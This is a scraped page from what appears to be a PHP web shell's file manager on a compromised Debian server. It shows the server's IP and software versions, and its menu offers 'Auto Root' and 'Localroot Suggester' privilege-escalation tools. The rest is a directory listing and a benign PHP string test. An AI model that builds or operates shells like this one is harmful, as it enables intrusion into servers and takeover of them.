Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
tests /
strings /
Delete
Unzip
Name
Size
Permission
Date
Action
001.phpt
4.71
KB
-rw-rw-r--
2022-10-31 11:36
002.phpt
2.53
KB
-rw-rw-r--
2022-10-31 11:36
004.phpt
968
B
-rw-rw-r--
2022-10-31 11:36
bug22592.phpt
433
B
-rw-rw-r--
2022-10-31 11:36
bug26703.phpt
666
B
-rw-rw-r--
2022-10-31 11:36
offsets_chaining_1.phpt
195
B
-rw-rw-r--
2022-10-31 11:36
offsets_chaining_2.phpt
195
B
-rw-rw-r--
2022-10-31 11:36
offsets_chaining_3.phpt
199
B
-rw-rw-r--
2022-10-31 11:36
offsets_chaining_4.phpt
199
B
-rw-rw-r--
2022-10-31 11:36
offsets_chaining_5.phpt
769
B
-rw-rw-r--
2022-10-31 11:36
offsets_general.phpt
1.72
KB
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Bug #22592 (Cascading assignments to strings with curly braces broken) --FILE-- <?php $wrong = $correct = 'abcdef'; $t = $x[] = 'x'; var_dump($correct); var_dump($wrong); $correct[1] = '*'; $correct[3] = '*'; $correct[5] = '*'; // This produces the $wrong[1] = $wrong[3] = $wrong[5] = '*'; var_dump($correct); var_dump($wrong); ?> --EXPECT-- string(6) "abcdef" string(6) "abcdef" string(6) "a*c*e*" string(6) "a*c*e*"